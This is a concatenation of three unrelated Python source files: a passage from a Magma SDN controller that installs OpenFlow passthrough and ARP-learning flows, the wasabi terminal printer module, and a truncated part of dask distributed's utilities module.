tbl_num=self._imsi_set_tbl_num)
def add_arp_response_flow(self, imsi, yiaddr, chaddr):
if self.arp_contoller or self.arpd_controller_fut.done():
if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.add_ue_arp_flows(self._datapath,
yiaddr, chaddr)
self.logger.debug("From DHCP learn: IMSI %s, has ip %s and mac %s",
imsi, yiaddr, chaddr)
# Associate IMSI to IPv4 addr in directory service
threading.Thread(target=update_record, args=(str(imsi),
yiaddr)).start()
else:
self.logger.error("ARPD controller not ready, ARP learn FAILED")
def _add_resubmit_flow(self, sid, match, action=None,
priority=flows.DEFAULT_PRIORITY,
next_table=None, tbl_num=None, cookie=0):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if next_table is None:
next_table = self.next_table
if tbl_num is None:
tbl_num = self.tbl_num
# Add IMSI metadata
if sid:
actions.append(parser.NXActionRegLoad2(dst=IMSI_REG,
value=encode_imsi(sid)))
flows.add_resubmit_next_service_flow(self._datapath, tbl_num,
match, actions=actions,
priority=priority, cookie=cookie,
resubmit_table=next_table)
def _delete_resubmit_flow(self, sid, match, action=None, tbl_num=None):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if tbl_num is None:
tbl_num = self.tbl_num
# Add IMSI metadata
actions.append(
parser.NXActionRegLoad2(dst=IMSI_REG, value=encode_imsi(sid)))
flows.delete_flow(self._datapath, tbl_num, match, actions=actions)
def _add_dns_passthrough_flows(self):
parser = self._datapath.ofproto_parser
# Set so packet skips enforcement and send to egress
action = load_passthrough(parser)
# Install UDP flows for DNS
ulink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_dst=53)
self._add_resubmit_flow(None, ulink_match_udp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=53)
self._add_resubmit_flow(None, dlink_match_udp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
# Install TCP flows for DNS
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=53)
self._add_resubmit_flow(None, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=53)
self._add_resubmit_flow(None, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
# Install TCP flows for DNS over tls
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=853)
self._add_resubmit_flow(None, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=853)
self._add_resubmit_flow(None, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
def _add_dhcp_passthrough_flows(self):
ofproto, parser = self._datapath.ofproto, self._datapath.ofproto_parser
# Set so packet skips enforcement controller
action = load_passthrough(parser)
uplink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=68,
udp_dst=67)
self._add_resubmit_flow(None, uplink_match, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
downlink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=67,
udp_dst=68)
# Set so triggers packetin and we can learn the ip to do arp response
self._add_resubmit_flow(None, downlink_match, action,
flows.PASSTHROUGH_PRIORITY, next_table=self._dhcp_learn_scratch,
tbl_num=self._passthrough_set_tbl)
# Install default flow for dhcp learn scratch
flows.add_output_flow(self._datapath, self._dhcp_learn_scratch,
match=MagmaMatch(), actions=[],
priority=flows.PASSTHROUGH_PRIORITY,
output_port=ofproto.OFPP_CONTROLLER,
copy_table=self.next_table,
max_len=ofproto.OFPCML_NO_BUFFER)
def _add_uplink_arp_allow_flow(self):
arp_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_ARP)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
arp_match, actions=[],
priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _learn_arp_entry(self, ev):
"""
Learn action to process PacketIn DHCP packets, dhcp ack packets will
be used to learn the ARP entry for the UE to install rules in the arp
table. The DHCP packets will then be sent thorugh the pipeline.
"""
msg = ev.msg
if self._dhcp_learn_scratch != msg.table_id:
# Intended for other application
return
try:
encoded_imsi = _get_encoded_imsi_from_packetin(msg)
# Decode the imsi to properly save in directoryd
imsi = decode_imsi(encoded_imsi)
except MagmaOFError as e:
# No packet direction, but intended for this table
self.logger.error("Error obtaining IMSI from pkt-in: %s", e)
return
pkt = packet.Packet(msg.data)
dhcp_header = pkt.get_protocols(dhcp.dhcp)[0]
# DHCP yiaddr is the client(UE) ip addr
# chaddr is the client mac address
self.add_arp_response_flow(imsi, dhcp_header.yiaddr, dhcp_header.chaddr)
def _install_default_flows(self):
"""
Install default flows
"""
# Allows arp packets from uplink(no eth dst set) to go to the arp table
self._add_uplink_arp_allow_flow()
self._add_dhcp_passthrough_flows()
self._add_dns_passthrough_flows()
self._add_resubmit_flow(None, MagmaMatch(),
priority=flows.MINIMUM_PRIORITY,
tbl_num=self._passthrough_set_tbl)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._add_resubmit_flow(None, MagmaMatch(in_port=self._dpi_port),
priority=flows.PASSTHROUGH_PRIORITY,
next_table=self._app_set_tbl_num)
if self._li_port:
match = MagmaMatch(in_port=self._li_port)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
match, actions=[], priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
# TODO We might want a default drop all rule with min priority, but
# adding it breakes all unit tests for this controller(needs work)
def _get_encoded_imsi_from_packetin(msg):
"""
Retrieve encoded imsi from the Packet-In message, or raise an exception if
it doesn't exist.
"""
imsi = msg.match.get(IMSI_REG)
if imsi is None:
raise MagmaOFError('IMSI not found in OFPMatch')
return imsi
|
printer.py
|
# coding: utf8
from __future__ import unicode_literals, print_function
import datetime
from collections import Counter
from contextlib import contextmanager
from multiprocessing import Process
import itertools
import sys
import time
import os
import traceback
from .tables import table, row
from .util import wrap, supports_ansi, can_render, locale_escape
from .util import MESSAGES, COLORS, ICONS
from .util import color as _color
class Printer(object):
def __init__(
self,
pretty=True,
no_print=False,
colors=None,
icons=None,
line_max=80,
animation="⠙⠹⠸⠼⠴⠦⠧⠇⠏",
animation_ascii="|/-\\",
hide_animation=False,
ignore_warnings=False,
env_prefix="WASABI",
timestamp=False,
):
"""Initialize the command-line printer.
pretty (bool): Pretty-print output (colors, icons).
no_print (bool): Don't actually print, just return.
colors (dict): Add or overwrite color values, name mapped to value.
icons (dict): Add or overwrite icons. Name mapped to unicode icon.
line_max (int): Maximum line length (for divider).
animation (unicode): Steps of loading animation for loading() method.
animation_ascii (unicode): Alternative animation for ASCII terminals.
hide_animation (bool): Don't display animation, e.g. for logs.
ignore_warnings (bool): Do not output messages of type MESSAGE.WARN.
env_prefix (unicode): Prefix for environment variables, e.g.
WASABI_LOG_FRIENDLY.
timestamp (bool): Print a timestamp (default False).
RETURNS (Printer): The initialized printer.
"""
env_log_friendly = os.getenv("{}_LOG_FRIENDLY".format(env_prefix), False)
env_no_pretty = os.getenv("{}_NO_PRETTY".format(env_prefix), False)
self._counts = Counter()
self.pretty = pretty and not env_no_pretty
self.no_print = no_print
self.show_color = supports_ansi() and not env_log_friendly
self.hide_animation = hide_animation or env_log_friendly
self.ignore_warnings = ignore_warnings
self.line_max = line_max
self.colors = dict(COLORS)
self.icons = dict(ICONS)
self.timestamp = timestamp
if colors:
self.colors.update(colors)
if icons:
self.icons.update(icons)
self.anim = animation if can_render(animation) else animation_ascii
@property
def counts(self):
"""Get the counts of how often the special printers were fired,
e.g. MESSAGES.GOOD. Can be used to print an overview like "X warnings".
"""
return self._counts
def good(self, title="", text="", show=True, spaced=False, exits=None):
"""Print a success message."""
return self._get_msg(
title, text, style=MESSAGES.GOOD, show=show, spaced=spaced, exits=exits
)
def fail(self, title="", text="", show=True, spaced=False, exits=None):
"""Print an error message."""
return self._get_msg(
title, text, style=MESSAGES.FAIL, show=show, spaced=spaced, exits=exits
)
def warn(self, title="", text="", show=True, spaced=False, exits=None):
"""Print a warning message."""
return self._get_msg(
title, text, style=MESSAGES.WARN, show=show, spaced=spaced, exits=exits
)
def info(self, title="", text="", show=True, spaced=False, exits=None):
"""Print an informational message."""
return self._get_msg(
title, text, style=MESSAGES.INFO, show=show, spaced=spaced, exits=exits
)
def text(
self,
title="",
text="",
color=None,
icon=None,
spaced=False,
show=True,
no_print=False,
exits=None,
):
"""Print a message.
title (unicode): The main text to print.
text (unicode): Optional additional text to print.
color (unicode / int): Foreground color.
icon (unicode): Name of icon to add.
spaced (unicode): Whether to add newlines around the output.
show (bool): Whether to print or not. Can be used to only output
messages under certain condition, e.g. if --verbose flag is set.
no_print (bool): Don't actually print, just return.
exits (int): Perform a system exit.
"""
if not show:
return
if self.pretty:
color = self.colors.get(color)
icon = self.icons.get(icon)
if icon:
title = locale_escape("{} {}".format(icon, title)).strip()
if self.show_color:
title = _color(title, fg=color)
title = wrap(title, indent=0)
if text:
title = "{}\n{}".format(title, wrap(text, indent=0))
if self.timestamp:
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
title = "{}\t{}".format(now, title)
if exits is not None or spaced:
title = "\n{}\n".format(title)
if not self.no_print and not no_print:
print(title)
if exits is not None:
sys.stdout.flush()
sys.stderr.flush()
if self.no_print or no_print and exits != 0:
try:
raise RuntimeError(title.strip())
except Exception as e:
# Remove wasabi from the traceback and re-raise
tb = "\n".join(traceback.format_stack()[:-3])
raise SystemExit("{}\n{}".format(tb, e))
sys.exit(exits)
if self.no_print or no_print:
return title
def divider(self, text="", char="=", show=True, icon=None):
"""Print a divider with a headline:
============================ Headline here ===========================
text (unicode): Headline text. If empty, only the line is printed.
char (unicode): Line character to repeat, e.g. =.
show (bool): Whether to print or not.
icon (unicode): Optional icon to display with title.
"""
if not show:
return
if len(char) != 1:
raise ValueError(
"Divider chars need to be one character long. "
"Received: {}".format(char)
)
if self.pretty:
icon = self.icons.get(icon)
if icon:
text = locale_escape("{} {}".format(icon, text)).strip()
deco = char * (int(round((self.line_max - len(text))) / 2) - 2)
text = " {} ".format(text) if text else ""
text = _color(
"\n{deco}{text}{deco}".format(deco=deco, text=text), bold=True
)
if len(text) < self.line_max:
text = text + char * (self.line_max - len(text))
if self.no_print:
return text
print(text)
def table(self, data, **kwargs):
"""Print data as a table.
data (iterable / dict): The data to render. Either a list of lists
(one per row) or a dict for two-column tables.
kwargs: Table settings. See tables.table for details.
"""
title = kwargs.pop("title", None)
text = table(data, **kwargs)
if title:
self.divider(title)
if self.no_print:
return text
print(text)
def row(self, data, **kwargs):
"""Print a table row.
data (iterable): The individual columns to format.
kwargs: Row settings. See tables.row for details.
"""
text = row(data, **kwargs)
if self.no_print:
return text
print(text)
@contextmanager
def loading(self, text="Loading..."):
if self.no_print:
yield
elif self.hide_animation:
print(text)
yield
else:
sys.stdout.flush()
t = Process(target=self._spinner, args=(text,))
t.start()
try:
yield
except Exception as e:
# Handle exception inside the with block
t.terminate()
sys.stdout.write("\n")
raise (e)
t.terminate()
sys.stdout.write("\r\x1b[2K") # erase line
sys.stdout.flush()
def _spinner(self, text="Loading..."):
for char in itertools.cycle(self.anim):
sys.stdout.write("\r{} {}".format(char, text))
sys.stdout.flush()
time.sleep(0.1)
def _get_msg(self, title, text, style=None, show=None, spaced=False, exits=None):
if self.ignore_warnings and style == MESSAGES.WARN:
show = False
self._counts[style] += 1
return self.text(
title, text, color=style, icon=style, show=show, spaced=spaced, exits=exits
)
|
utils.py
|
from __future__ import annotations
import asyncio
import contextvars
import functools
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from collections.abc import Container, KeysView, ValuesView
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from contextvars import ContextVar
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
from types import ModuleType
from typing import Any as AnyType
from typing import ClassVar
import click
import tblib.pickling_support
try:
import resource
except ImportError:
resource = None # type: ignore
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
from dask.utils import parse_timedelta as _parse_timedelta
from dask.widgets import get_template
from distributed.compatibility import WINDOWS
from distributed.metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
if method == "forkserver":
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from distributed.versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except OSError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError(f"interface {ifname!r} doesn't have an IPv4 address")
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
class NoOpAwaitable:
"""An awaitable object that always returns None.
Useful to return from a method that can be called in both asynchronous and
synchronous contexts"""
def __await__(self):
async def f():
return None
return f().__await__()
class SyncMethodMixin:
"""
A mixin for adding an `asynchronous` attribute and `sync` method to a class.
Subclasses must define a `loop` attribute for an associated
`tornado.IOLoop`, and may also add a `_asynchronous` attribute indicating
whether the class should default to asynchronous behavior.
"""
@property
def asynchronous(self):
"""Are we running in the event loop?"""
return in_async_call(self.loop, default=getattr(self, "_asynchronous", False))
def sync(self, func, *args, asynchronous=None, callback_timeout=None, **kwargs):
"""Call `func` with `args` synchronously or asynchronously depending on
the calling context"""
callback_timeout = _parse_timedelta(callback_timeout)
if asynchronous is None:
asynchronous = self.asynchronous
if asynchronous:
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
return future
else:
return sync(
self.loop, func, *args, callback_timeout=callback_timeout, **kwargs
)
def in_async_call(loop, default=False):
"""Whether this call is currently within an async call"""
try:
return loop.asyncio_loop is asyncio.get_running_loop()
except RuntimeError:
# No *running* loop in thread. If the event loop isn't running, it
# _could_ be started later in this thread though. Return the default.
if not loop.asyncio_loop.is_running():
return default
return False
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
callback_timeout = _parse_timedelta(callback_timeout, "s")
if loop.asyncio_loop.is_closed():
raise RuntimeError("IOLoop is closed")
e = threading.Event()
main_tid = threading.get_ident()
result = error = future = None # set up non-locals
@gen.coroutine
def f():
nonlocal result, error, future
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
future = asyncio.ensure_future(future)
result = yield future
except Exception:
error = sys.exc_info()
finally:
e.set()
def cancel():
if future is not None:
future.cancel()
def wait(timeout):
try:
return e.wait(timeout)
except KeyboardInterrupt:
loop.add_callback(cancel)
raise
loop.add_callback(f)
if callback_timeout is not None:
if not wait(callback_timeout):
raise TimeoutError(f"timed out after {callback_timeout} s.")
else:
while not e.is_set():
wait(10)
if error:
typ, exc, tb = error
raise exc.with_traceback(tb)
else:
return result
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops: ClassVar[
weakref.WeakKeyDictionary[IOLoop, tuple[int, LoopRunner | None]]
] = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
if loop is None:
if asynchronous:
self._loop = IOLoop.current()
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
# run loop forever if it's not running already
try:
if not loop.asyncio_loop.is_running():
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if start_exc[0] is not None and not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError(
f"not an exception: {start_exc[0]!r}",
)
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x) -> str:
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return "Other"
@contextmanager
def log_errors(pdb=False):
from distributed.comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('') # Maps as localhost for binding e.g. 'tcp://:8811'
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
if not hostname:
hostname = "localhost"
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
"""Truncate exception to be about a certain length"""
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError(f"Unexpected key type {typ} (value: {k!r})")
def _maybe_complex(task):
"""Possibly contains a nested task"""
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2**16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2**16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
The object to be converted. Will correctly handled
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
